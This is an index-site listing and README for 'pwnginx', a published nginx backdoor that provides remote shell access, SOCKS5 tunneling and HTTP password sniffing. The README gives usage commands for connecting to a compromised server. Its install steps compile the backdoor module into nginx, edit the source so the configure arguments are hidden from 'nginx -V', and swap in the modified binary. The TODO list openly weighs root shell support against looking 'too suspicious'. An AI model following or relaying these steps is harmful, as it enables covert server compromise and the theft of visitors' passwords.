Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/t57root/pwnginx
Pwn nginx - a nginx backdoor provides shell access, socks5 tunneling, http password sniffing.
https://github.com/t57root/pwnginx
backdoor nginx pwn-nginx socks5-tunneling
Last synced: 24 days ago
JSON representation
Pwn nginx - a nginx backdoor provides shell access, socks5 tunneling, http password sniffing.
- Host: GitHub
- URL: https://github.com/t57root/pwnginx
- Owner: t57root
- Created: 2013-05-08T10:34:44.000Z (over 11 years ago)
- Default Branch: master
- Last Pushed: 2019-06-12T17:49:29.000Z (over 5 years ago)
- Last Synced: 2024-08-04T04:03:22.941Z (4 months ago)
- Topics: backdoor, nginx, pwn-nginx, socks5-tunneling
- Language: C
- Homepage:
- Size: 180 KB
- Stars: 226
- Watchers: 13
- Forks: 73
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-network-stuff - **137**星 - a nginx backdoor provides shell access, socks5 tunneling, http password sniffing. (<a id="7bf0f5839fb2827fdc1b93ae6ac7f53d"></a>工具 / <a id="32739127f0c38d61b14448c66a797098"></a>嗅探&&Sniff)
README
#[ Pwnginx ] - Pwn nginx
Copyleft by t57root @ openwill.me
<[email protected]> [www.HackShell.net](http://www.hackshell.net/)
Usage:
Get shell access via the nginx running @ [ip]:[port]
./pwnginx shell [ip] [port] [password]
Get a socks5 tunnel listening at [socks5ip]:[socks5port]
./pwnginx socks5 [ip] [port] [password] [socks5ip] [socks5port]
###Features:
* Remote shell access* Socks5 tunneling via existing http connection
* Http password sniffing & logging
###INSTALL:
* Compile the client:
$ cd client;make
* Edit source to hidden configure arguments:
$ vim src/core/nginx.c
Modify the `configure arguments` line into: `configure arguments: --prefix=/opt/nginx\n");` (original configure arguments shown in the result of `nginx -V`)* Recompile nginx:
$ cd /path/to/nginx/source; ./configure --prefix=/opt/nginx --add-module=/path/to/pwnginx/module && make (There is no need to run `make install`)
$ sudo cp -f objs/nginx /path/to/nginx/sbin/nginx
* Restart nginx
$ sudo killall nginx && /path/to/nginx/sbin/nginx
###TODO:
* Pack communication traffic into HTTP protocol
* Full pty support
* Shell with root privilege(? There must be another stand-alone 'nginx: master process' running under root to support this function. Maybe that's too suspicious. Being considered.)